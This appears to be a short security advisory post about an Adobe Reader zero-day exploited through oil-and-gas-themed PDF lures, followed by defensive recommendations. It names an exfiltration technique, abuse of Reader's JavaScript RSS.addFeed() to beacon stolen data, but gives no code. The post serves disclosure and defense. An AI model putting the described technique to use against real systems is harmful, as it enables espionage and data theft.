A sophisticated zero-day vulnerability in @[Adobe](urn:li:organization:1480) Reader is being leveraged in a targeted campaign that has remained undetected since at least December 2025. The attack utilizes high-fidelity document lures related to the Russian oil and gas industry to achieve silent code execution on victim endpoints.
The exploit targets the JavaScript engine within @[Adobe](urn:li:organization:1480) Reader, utilizing privileged APIs to access and exfiltrate local system data. Researchers have observed the exploit calling the RSS.addFeed() function to beacon stolen information back to actor-controlled infrastructure. The use of specific industry lures suggests a state-sponsored or advanced persistent threat actor focused on industrial espionage.
Targeting document readers is an effective way to bypass perimeter defenses because PDFs are a fundamental component of business communication. When combined with a zero-day exploit and sector-specific social engineering, the likelihood of a successful initial intrusion increases exponentially.
– Monitor for an official security update from @[Adobe](urn:li:organization:1480) and apply it to all Acrobat and Reader instances immediately upon release.
– Implement automated scanning of PDF attachments and block files containing obfuscated JavaScript or unauthorized API calls.
– Train users to be wary of unsolicited PDF documents, even when they appear to relate to relevant industry topics.
– Utilize EDR to monitor for anomalous network connections originating from PDF reader processes.
The persistence of this zero-day highlights the strategic value of targeting core productivity software with tailored industry intelligence. #CodeDefence #Adobe #ZeroDay #IndustrialEspionage
/